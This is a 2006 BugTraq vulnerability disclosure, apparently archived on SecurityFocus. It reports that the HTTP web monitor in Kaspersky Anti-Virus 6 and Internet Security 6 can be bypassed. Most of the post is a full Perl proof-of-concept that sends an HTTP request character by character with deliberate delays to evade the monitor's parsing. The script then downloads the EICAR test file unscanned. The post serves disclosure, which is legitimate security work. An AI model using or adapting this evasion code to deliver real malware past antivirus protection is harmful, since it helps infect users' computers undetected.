BugTraq
Kaspersky antivirus 6: HTTP monitor bypassing May 22 2006 08:09PM
john kak-sam to
Kaspersky antivirus 6

Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).

Any mailicious software on local computer can bypass HTTP virus monitor.

Solution:

There is no known solution.

Exploit code:

This perl script could be run with ActiveState Perl 5.8:

use IO::Socket::INET;

use strict;

my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',

'http://www.eicar.com/download/eicar.com' );

syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)\n";

my $s = IO::Socket::INET->new( PeerAddr => $h_srv,

PeerPort => $h_port,

Proto => 'tcp' );

die "socket: $!" unless $s;

sendthem( $s,

"GET $h_url HTTP/1.1",

"Host: $h_srv",

""

);

my $doc = read_body( $s, read_headers( $s ) );

syswrite STDOUT,

'document is <'.$doc.'> len='.length($doc)."\n";

sub sendthem {

my $s = shift;

my $c = 0;

foreach( @_ ) {

my @a = split //, $_;

++$c;

syswrite STDOUT, "query $c: ";

foreach( @a ) {

sendone( $s, $_ );

}

sendone( $s, "\r" );

sendone( $s, "\n" );

}

}

sub sendone {

my( $s, $v ) = @_;

$s->syswrite( $v );

syswrite STDOUT, $v;

# !!! comment next line to have monitoring working ;)

select( undef, undef, undef, 0.300 );

}

sub read_headers {

my( $s ) = @_;

my( $c, $cl ) = ( 0, 0 );

for( ;; ) {

my $l = read_line( $s );

++$c;

syswrite STDOUT, "header $c: $l";

syswrite STDOUT, "\r\n";

last if not $l and $c;

$cl = $1 if $l =~ /^Content-Length:\s+(\d+)/;

}

$cl;

}

sub read_line {

my( $s ) = @_;

my $str = '';

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

die 'EOF reading headers!' unless $r;

last if $v eq "\n";

next if $v eq "\r";

$str .= $v;

}

return $str;

}

sub read_body {

my( $s, $cl ) = @_;

my( $str, $cli ) = ( '', $cl );

syswrite STDOUT, "reading body <content-length: $cli> ...\n";

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

last unless $r;

$str .= $v;

--$cl if $cli;

last if not $cl and $cli;

}

return $str;

}

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus